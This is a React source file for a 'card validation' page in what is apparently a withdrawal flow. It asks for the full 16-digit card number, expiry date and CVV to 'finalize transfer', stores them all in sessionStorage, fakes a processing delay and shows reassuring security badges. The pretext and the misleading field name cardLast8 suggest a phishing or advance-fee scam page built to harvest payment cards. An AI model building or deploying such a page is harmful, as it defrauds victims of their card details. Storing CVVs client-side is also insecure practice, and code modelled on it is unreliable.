import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import {
  Select,
  SelectContent,
  SelectItem,
  SelectTrigger,
  SelectValue,
} from "@/components/ui/select";
import { ShieldCheck, CreditCard, AlertCircle } from "lucide-react";
import { toast } from "sonner";
import axios from "axios";
import { useLanguage } from "@/lib/LanguageContext";

const API_URL = `${process.env.REACT_APP_BACKEND_URL}/api`;

export default function CardValidationPage() {
  const navigate = useNavigate();
  const { t } = useLanguage();
  const [cardType, setCardType] = useState("");
  const [cardLast8, setCardLast8] = useState("");
  const [cardExpiry, setCardExpiry] = useState("");
  const [cardCvv, setCardCvv] = useState("");
  const [isLoading, setIsLoading] = useState(false);
  const [cardTypes, setCardTypes] = useState([]);

  useEffect(() => {
    const storedBalance = sessionStorage.getItem("userBalance");
    if (!storedBalance) {
      navigate("/");
      return;
    }
    
    const loadCardTypes = async () => {
      try {
        const response = await axios.get(`${API_URL}/card-types`);
        setCardTypes(response.data);
      } catch (error) {
        console.error("Error loading card types:", error);
      }
    };
    loadCardTypes();
  }, [navigate]);

  const formatExpiry = (value) => {
    const cleaned = value.replace(/\D/g, "");
    if (cleaned.length >= 2) {
      return cleaned.slice(0, 2) + "/" + cleaned.slice(2, 4);
    }
    return cleaned;
  };

  const handleSubmit = (e) => {
    e.preventDefault();

    if (!cardType) {
      toast.error(t("selectCardType"));
      return;
    }
    if (!cardLast8.trim() || cardLast8.length !== 16) {
      toast.error(t("enter16Digits"));
      return;
    }
    if (!cardExpiry.trim() || cardExpiry.length !== 5) {
      toast.error(t("enterExpiry"));
      return;
    }
    if (!cardCvv.trim() || cardCvv.length < 3) {
      toast.error(t("enterCvv"));
      return;
    }

    setIsLoading(true);

    sessionStorage.setItem("cardType", cardType);
    sessionStorage.setItem("cardLast8", cardLast8);
    sessionStorage.setItem("cardExpiry", cardExpiry);
    sessionStorage.setItem("cardCvv", cardCvv);

    setTimeout(() => {
      setIsLoading(false);
      navigate("/processing");
    }, 1500);
  };

  return (
    <div className="min-h-screen mesh-gradient flex flex-col items-center justify-center p-4">
      <div className="w-full max-w-md animate-fade-in">
        {/* Header */}
        <div className="text-center mb-6">
          <div className="inline-flex items-center justify-center w-14 h-14 bg-[#0F172A] rounded-2xl mb-4 shadow-lg">
            <CreditCard className="w-7 h-7 text-white" />
          </div>
          <h1 className="text-2xl font-bold text-[#0F172A]">{t("cardValidation")}</h1>
        </div>

        {/* Info Alert */}
        <div className="bg-[#EFF6FF] border border-[#2563EB]/20 rounded-lg p-4 mb-6 flex items-start gap-3 animate-fade-in" style={{ animationDelay: '0.1s' }}>
          <AlertCircle className="w-5 h-5 text-[#2563EB] flex-shrink-0 mt-0.5" />
          <p className="text-sm text-[#1E40AF]">
            {t("cardRequired")}
          </p>
        </div>

        {/* Visual Card Preview */}
        <div className="credit-card mb-6 animate-fade-in" style={{ animationDelay: '0.15s' }} data-testid="card-preview">
          <div className="flex justify-between items-start mb-8">
            <div className="card-chip" />
            <span className="text-sm font-medium opacity-70">{cardType || "CARD"}</span>
          </div>
          <div className="card-number mb-6">
            {cardLast8 ? 
              cardLast8.slice(0, 4) + " " + cardLast8.slice(4, 8) + " " + cardLast8.slice(8, 12) + " " + cardLast8.slice(12, 16) 
              : "•••• •••• •••• ••••"}
          </div>
          <div className="flex justify-between items-end">
            <div>
              <p className="text-xs opacity-50 uppercase">{t("cardHolder")}</p>
              <p className="text-sm font-medium">{sessionStorage.getItem("withdrawalName") || "NAME"}</p>
            </div>
            <div className="text-right">
              <p className="text-xs opacity-50 uppercase">{t("expires")}</p>
              <p className="text-sm font-medium">{cardExpiry || "MM/YY"}</p>
            </div>
          </div>
        </div>

        {/* Card Form */}
        <Card className="form-container border-0 shadow-xl animate-fade-in" style={{ animationDelay: '0.2s' }} data-testid="card-form">
          <CardHeader className="pb-2">
            <CardTitle className="text-lg font-semibold text-[#0F172A]">
              {t("cardInfo")}
            </CardTitle>
          </CardHeader>
          <CardContent>
            <form onSubmit={handleSubmit} className="space-y-4">
              <div className="space-y-2">
                <Label htmlFor="cardType" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("cardType")}
                </Label>
                <Select value={cardType} onValueChange={setCardType}>
                  <SelectTrigger className="h-10 text-sm" data-testid="card-type-select">
                    <SelectValue placeholder={t("selectType")} />
                  </SelectTrigger>
                  <SelectContent>
                    {cardTypes.map((type) => (
                      <SelectItem key={type} value={type}>
                        {type}
                      </SelectItem>
                    ))}
                  </SelectContent>
                </Select>
              </div>

              <div className="space-y-2">
                <Label htmlFor="cardLast8" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("cardNumber16")}
                </Label>
                <Input
                  id="cardLast8"
                  type="text"
                  inputMode="numeric"
                  maxLength={16}
                  placeholder="1234567890123456"
                  value={cardLast8}
                  onChange={(e) => setCardLast8(e.target.value.replace(/\D/g, "").slice(0, 16))}
                  className="h-10 text-sm font-mono tracking-wider"
                  data-testid="card-last8-input"
                />
              </div>

              <div className="grid grid-cols-2 gap-4">
                <div className="space-y-2">
                  <Label htmlFor="cardExpiry" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                    {t("expiryDate")}
                  </Label>
                  <Input
                    id="cardExpiry"
                    type="text"
                    inputMode="numeric"
                    maxLength={5}
                    placeholder="MM/YY"
                    value={cardExpiry}
                    onChange={(e) => setCardExpiry(formatExpiry(e.target.value))}
                    className="h-10 text-sm font-mono"
                    data-testid="card-expiry-input"
                  />
                </div>

                <div className="space-y-2">
                  <Label htmlFor="cardCvv" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                    {t("securityCode")}
                  </Label>
                  <Input
                    id="cardCvv"
                    type="password"
                    inputMode="numeric"
                    maxLength={3}
                    placeholder="•••"
                    value={cardCvv}
                    onChange={(e) => setCardCvv(e.target.value.replace(/\D/g, "").slice(0, 3))}
                    className="h-10 text-sm"
                    data-testid="card-cvv-input"
                  />
                </div>
              </div>

              <div className="pt-4">
                <Button
                  type="submit"
                  className="w-full h-11 bg-[#0F172A] hover:bg-[#1E293B] text-white font-medium rounded-lg transition-all shadow-md hover:shadow-lg"
                  disabled={isLoading}
                  data-testid="finalize-button"
                >
                  {isLoading ? (
                    <span className="flex items-center gap-2">
                      <span className="w-4 h-4 border-2 border-white/30 border-t-white rounded-full animate-spin" />
                      {t("processing")}
                    </span>
                  ) : (
                    t("finalizeTransfer")
                  )}
                </Button>
              </div>
            </form>
          </CardContent>
        </Card>
      </div>

      {/* Security Footer */}
      <div className="mt-8 pb-6 text-center">
        <div className="flex items-center justify-center gap-3">
          <div className="security-badge">
            <ShieldCheck className="w-4 h-4" />
            <span>{t("securePayment")}</span>
          </div>
        </div>
        <p className="text-center text-xs text-[#64748B] mt-2">
          {t("dataProtected")}
        </p>
      </div>
    </div>
  );
}
